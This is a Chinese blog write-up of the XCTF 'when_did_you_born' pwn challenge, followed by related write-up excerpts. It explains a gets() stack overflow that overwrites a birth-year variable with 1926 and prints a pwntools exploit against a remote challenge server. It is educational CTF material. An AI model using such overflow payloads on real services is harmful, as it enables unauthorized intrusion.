[攻防世界 pwn]——when_did_you_born

最新推荐文章于 2021-02-27 10:51:47 发布
原创 最新推荐文章于 2021-02-27 10:51:47 发布 · 165 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

该博客介绍了CTF比赛中的一道题目,涉及64位系统的checksec和栈溢出漏洞利用。通过IDA分析,只要在输入时将变量v5设置为1926,然后利用gets函数导致栈溢出来改变v4的值,即可成功解决挑战。提供的exploit代码展示了如何发送特定的payload来完成这一操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[攻防世界 pwn]——when_did_you_born

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:
    在这里插入图片描述
    checksec看下 64位
    在这里插入图片描述
    IDA中,只要v5最初不是1926,之后改为1926就可以了。利用gets栈溢出就好v4与v5相差0x20 -0x18
    在这里插入图片描述
    在这里插入图片描述

exploit

from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",58101)
p.sendlineafter("What's Your Birth?\n", '2001')
payload = 'a' * 8 + p64(0x786)
p.sendlineafter("What's Your Name?", payload)
p.interactive()
攻防世界 when_did_you_born
09-28 301
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
攻防世界-pwn when_did_you_born(栈覆盖)
菜的只能随便写写博客
08-10 1489
0x01 拿到文件之后,先检查文件的基本信息 文件信息 64bit elf可执行文件 无PIE保护   0x02 执行文件 文件之中有两个输入,第一个输入有回显   0x03 IDA静态分析 可以看出获取flag需要用到v5的值,首先需要v5不等于1926,进入else这个块之中,然后又需要v5等于1926才能获取flag,就产生了矛盾。 结合程序有两个输入,可以考...
[PWN](攻防世界)when_did_you_born
ljh15937的博客
09-17 236
分析程序漏洞 通过 checksec 获取程序的基本信息 64位小端序 开启了Canary,使用了栈不可执行技术 使用 IDA Pro 对程序进行静态分析 需要在第二次输入名字时覆盖第一次输入的年龄 使用 GDB 动态调试程序 可以发现第二次输入的名字就在第一次输入的年龄的前面,可以轻松将其覆盖成 1926 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') contex
攻防世界 - pwn - when_did_you_born
qq726232111的博客
03-16 258
A、程序分析 1、gets( 0 , rbp-20h ) -> rbp-20h 为缓冲区起始地址 2、[rbp-18h] ==786h -> 执行cat flag B、利用分析 1、构造payload通过gets()覆盖rbp-18h的内容 payload: 20h-19h(填充数据) + 18h-15h(0x0000786,判断条件) ...
攻防世界-wp-PWN-新手区-4-when_did_you_born
Scorpio_m7
02-18 1247
题目来源: CGCTF 题目描述: 只要知道你的年龄就能获得flag,但菜鸡发现无论如何输入都不正确,怎么办 题目场景: 111.198.29.45:47091 题目附件: 24ac28ef281b4b6caab44d6d52b17491 题目思路: 这是一道很简单的栈溢出的题,当然首先你得懂函数调用时栈的原理,你还得学会通过pwntools编写简单的Python脚本,还得懂点Linux运行的机制、懂点IDA。 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的
攻防世界pwn新手练习区-when_did_you_born
优快云_sunrise的博客
08-26 340
when_did_you_born查看基本信息并运行文件在IDA中分析 查看基本信息并运行文件 查看文件类型: file when_did_you_born 查看保护: checksec --file=when_did_you_born 运行文件:./when_did_you_born 在IDA中分析 文件64位,将其拖入64位ida中。 按 ...
攻防世界pwn when_did_you_born(栈溢出)
Haowill的博客
04-09 590
攻防世界pwn when_did_you_born(栈溢出) 这是我第一次写博客,希望帮助到大家,感谢大家的支持。 pwn题做题步骤 相信做这道题的同学们都是新手,或者是老手回来刷题。所以我这里会简单介绍我做pwn题的方法。 一、下载程序到电脑 这个就是下载到电脑里的样子。 二、判断程序类型 这个程序没有.exe后缀,所以它不是window的,它是linux的。在我们学习pwn的初期都是linux...
[CTF-PWN]攻防世界新手村-when_did_you_born[wp]
murongxuege的博客
09-29 683
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界pwn新手练习(when_did_you_born
BurYiA的博客
09-16 635
when_did_you_born ok 多余的话就不继续累赘了昂,直接上手 程序同上次一样开了NX(堆栈不可执行)和CANNARY(栈保护)
攻防世界_pwn_when_did_you_born(萌新版)
TedLau的博客
02-24 288
首发于鄙人博客:传送门 0x00 前言 省略file checksec,这个题的意思就是让我们输入的第二个值覆盖并改变我们输入的第一个值。 0x10 步骤 0x11 main函数 在main函数中我们可以发现题目要求我们输入Birth,若我们输入的值为1926,那么程序便会直接退出,若我们输入的不是1926,那么就会进入else中,而在else中,如果我们想cat flag,那么...
pwn when_did_you_born
doudoudedi
06-08 579
今天被一道被一道web给虐暴了自闭中~~~~~ 所以我做到pwn来缓缓 用ida打开只要v5=1926 就可以看flag 但按照前面的逻辑不可以等于所以 就涉及到了溢出 gets()这个很普遍了吧 直接算出偏移为8 然后就上exp咯 from pwn import * p=remote('111.198.29.45',56377) payload='a'*8+p64(1926) p.recvunt...
when_did_you_born--writeup
ATFWUS的博客
03-01 577
文件下载地址: 链接:https://pan.baidu.com/s/1eT_oVeEKPts8Lw2P0nDEnw 提取码:1axx 0x01.分析 checksec: 64位程序,开启了堆栈保护和栈不可执行。 查看源码: 理清一下流程,先要输入v5,第一次不能输入1926,否则会退出,然后第二次输入名字,然后如果v5等于1926就直接得到flag,第二次输入的时候使用了g...
when_did_you_born 栈溢出简单利用
zyh18851473527的博客
08-05 630
直接放到IDA里看下: 显而易见只要v5=1926,就可以看flag。但按照前面的逻辑不可以等于所以 就涉及到了溢出。gets函数溢出,这道题关键v5一开始不为1926,后面必须是1926,所以通过栈可以知道,用v4覆盖v5 下面利用缓冲区溢出,先输入v4字符串覆盖空间,然后再给v5赋值1926就好了,试试看,从ebp的偏移可以看出来v4距离v5需要覆盖8个字节 这样就得到flag啦 ...
攻防世界XCTF-Pwn入门11题解题报告
ailx10
03-15 1759
Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷题信息汇总如下:攻防世界XCTF黑客笔记刷题记录 ~第一题:level0解题报告:首先看看这个程序是啥呗,哦64位Linux可执行程序:IDA看看逻辑,输出一个hello world然后就...
攻防世界 pwn
清霂的博客
02-02 733
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
cgctf when_did_you_born 栈溢出简单利用
ditto的博客
12-22 2629
拿到题目,先checksec下,看下防护措施: 没有开启PIE。 直接放到IDA里看下: 有些变量名为了方便看,我已经修改过了。图中箭头处即是溢出点。 分析下 第一次输入overflowme,如果等于1926就会退出,但是想要拿到flag,就需要overflowme的值为1926,那就很明显了,第一次输入的时候随便输个数只要不是1926就行,第二次输入v4 这个数组的时候,利用缓冲区溢出,将o...
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1461
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
[攻防世界 pwn]——monkey
Y_peak的博客
02-27 998
[攻防世界 pwn]——monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题。checksec没什么大不了的 但是再IDA中就懵了,好大呀。好多文件。进入mian函数,也没有看很明白。准备运行程序看看到底是干什么的,帮助分析一下 输入尝试输入aaaa,发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以,但是有的命令可以有的不可以 在IDA中查看一下字符串,因为它可以输入的字
[攻防世界 pwn]——warmup
Y_peak的博客
02-20 825
[攻防世界 pwn]——warmup 题目地址: https://adworld.xctf.org.cn/ 题目: 嘶, 碰过的第一个盲打的题, nc连上之后只有一个地址, 这个地址肯定是个有用的地址, 应该就是可以执行 system("/bin/sh")或者 system(“cat flag”)的地址。 提供了一个输入, 应该是可以进行栈溢出, 不然就太难了。尝试一下, 不过不知道要填充的长度也不知道是64位还是32位的。 我们只有挨个尝试, 写个exp如下: exploit from pwn i
攻防世界pwn题目int_overflow
最新发布
03-08
### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时,理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时,这可能意味着某个`int`型变量存在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值